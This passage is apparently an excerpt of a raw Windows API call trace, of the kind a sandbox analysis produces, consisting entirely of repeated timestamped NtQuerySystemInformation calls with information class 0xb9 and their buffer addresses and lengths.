ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0209.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0209.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0209.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3a0, Length=0x28, ResultLength=0x0) [0209.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd410, Length=0x28, ResultLength=0x0) [0209.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0209.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd490, Length=0x28, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd330, Length=0x20, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd2b0, Length=0x20, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd570, Length=0x38, ResultLength=0x0) [0209.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd3f0, Length=0x20, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd380, Length=0x20, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x28, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc58, Length=0x28, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x20, ResultLength=0x0) [0209.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb30, Length=0x20, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x20, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x20, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0209.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 